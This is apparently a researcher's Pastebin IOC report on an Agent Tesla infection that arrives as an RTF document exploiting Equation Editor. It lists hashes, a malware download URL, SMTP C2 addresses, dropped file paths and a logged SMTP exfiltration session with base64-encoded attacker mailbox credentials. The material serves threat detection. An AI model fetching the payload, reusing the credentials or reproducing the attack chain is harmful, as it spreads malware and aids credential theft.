SHARE
TWEET

#Agenttesla_030919

VRad Sep 4th, 2019 (edited) 302 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #agenttesla #RAT #RTF #11882
  2.  
  3. https://pastebin.com/zhJvDz8M
  4.  
  5. previous_contact:
  6. 09/01/19    https://pastebin.com/MdDfZDdb
  7. 16/10/18    https://pastebin.com/d5DxTRrB
  8. 04/10/18    https://pastebin.com/JYShuXn4
  9. 11/10/18    https://pastebin.com/bkCSvJvM
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_agenttesla_111018/
  13.  
  14. attack_vector
  15. --------------
  16. email attach .DOC (RTF) > EQNED32 > GET 1 URL > AppData\Roaming\*.exe
  17.  
  18. email_headers
  19. --------------
  20. n/a
  21.  
  22. files
  23. --------------
  24. SHA-256     7a1ad06997a8e82d1074ee61523b3203b57aa0c4e130c4f5366fc9e7d7738979
  25. File name   10809A007-KOSSEN.doc            [Rich Text Format data]
  26. File size   234.5 KB (240123 bytes)
  27.  
  28. SHA-256     dde7c0ace711bce1edf7d87b761cdbfb3fc4be3e1d3736f222daece4d1abe08e
  29. File name   IMPULSE FASHION 7-12ETD VESSEL.doc  [Rich Text Format data]
  30. File size   195.98 KB (200684 bytes)
  31.  
  32. SHA-256     6f69d71d71878bd9406fb5fc4330fe3e14037ba5fdff85ff48b36619efe4a0f0
  33. File name   nwamhdk.exe     [PE32 executable (GUI) Intel 80386, for MS Windows]
  34. File size   881 KB (902144 bytes)
  35.  
  36. activity
  37. **************
  38. PL_SCR     
  39.         http://alhaji.top/nwama/nwama.exe
  40.  
  41. C2      [exfiltration by SMTP]     
  42.         199.79.63.211:587
  43.         199.79.63.218:587  
  44.  
  45. netwrk
  46. --------------
  47.  
  48. [http]
  49. 162.144.128.116     alhaji.top      GET /nwama/nwama.exe    HTTP/1.1    Mozilla/4.0
  50. 52.55.255.113       checkip.amazonaws.com   GET /           HTTP/1.1    no UA
  51.  
  52. [587]
  53. 199.79.63.211:587
  54. 199.79.63.218:587
  55.  
  56. comp
  57. --------------
  58. EQNEDT32.EXE    162.144.128.116 80  ESTABLISHED
  59. nwamhdk.exe 52.55.255.113   80  ESTABLISHED
  60. nwamhdk.exe 199.79.63.218   587 ESTABLISHED
  61. nwamhdk.exe 52.55.255.113   80  ESTABLISHED
  62. [System]    199.79.63.218   587 TIME_WAIT
  63. [System]    199.79.63.211   587 TIME_WAIT
  64.  
  65.  
  66. proc
  67. --------------
  68. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  69.  
  70. [11882, another context]
  71. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  72. C:\Users\operator\AppData\Roaming\nwamahjdg368489.exe
  73. C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
  74. C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
  75.  
  76. persist
  77. --------------
  78. (!)no persist
  79.  
  80. drop
  81. --------------
  82. C:\tmp\Temporary Internet Files\Content.IE5\CD4BKOGM\nwama[1].exe
  83. C:\Users\operator\AppData\Roaming\nwamahjdg368489.exe
  84. C:\Users\operator\AppData\Roaming\elwmykgc.o2m.zip
  85. C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
  86. C:\tmp\637030277594981562_6f226394-f8e3-4089-a87b-680191fc12a0.db
  87.  
  88. SMTP exfiltration fail
  89. --------------
  90. 220 us3.outbound.mailhostbox.com ESMTP Postfix
  91. EHLO APM11
  92. 250-us3.outbound.mailhostbox.com
  93. 250-PIPELINING
  94. 250-SIZE 41648128
  95. 250-VRFY
  96. 250-ETRN
  97. 250-STARTTLS
  98. 250-AUTH PLAIN LOGIN
  99. 250-AUTH=PLAIN LOGIN
  100. 250-ENHANCEDSTATUSCODES
  101. 250-8BITMIME
  102. 250 DSN
  103. AUTH login bndhbWFAbG9ncm9vbS50b3A=
  104. 334 UGFzc3dvcmQ6
  105. RnhnRk1BWDY=
  106. 235 2.7.0 Authentication successful
  107. MAIL FROM:<nwama@logroom.top>
  108. 250 2.1.0 Ok
  109. RCPT TO:<nwama@logroom.top>
  110. 550 5.4.6 <nwama@logroom.top>: Recipient address rejected: Email Sending Quota Exceeded
  111.  
  112. # # #
  113. https://www.virustotal.com/gui/file/7a1ad06997a8e82d1074ee61523b3203b57aa0c4e130c4f5366fc9e7d7738979/details
  114. https://www.virustotal.com/gui/file/dde7c0ace711bce1edf7d87b761cdbfb3fc4be3e1d3736f222daece4d1abe08e/details
  115. https://www.virustotal.com/gui/file/6f69d71d71878bd9406fb5fc4330fe3e14037ba5fdff85ff48b36619efe4a0f0/details
  116. https://analyze.intezer.com/#/analyses/f0570463-452b-42bc-99b7-2f18ade21a17
  117.  
  118. VR
  119.  
  120. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top